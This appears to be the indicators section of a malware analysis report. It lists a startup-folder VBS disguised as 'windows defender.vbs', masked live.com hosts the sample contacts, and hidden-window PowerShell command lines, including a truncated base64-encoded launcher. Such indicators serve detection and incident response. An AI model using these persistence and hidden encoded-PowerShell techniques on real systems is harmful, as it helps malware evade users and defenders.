Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows defender.vbs
- %APPDATA%\empty.vbs
- 'on####ve.live.com':443
- 'lo###.live.com':443
- DNS ASK on####ve.live.com
- DNS ASK lo###.live.com
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\Empty.Vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden (Start-Process -FilePath $env:AppData\Empty.Vbs)' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden (Start-Process -FilePath $env:AppData\Empty.Vbs)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgAoACcAPwB1AHIAcgBlAG4AdABAAG8AbQBhAGkAbgAnAC4AcgBlAHAAbABhAGMAZQAoACcAPwAnACwAJwBDACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAEAAJwAsACcARAAnACkAKQAuAEwAbwBhA...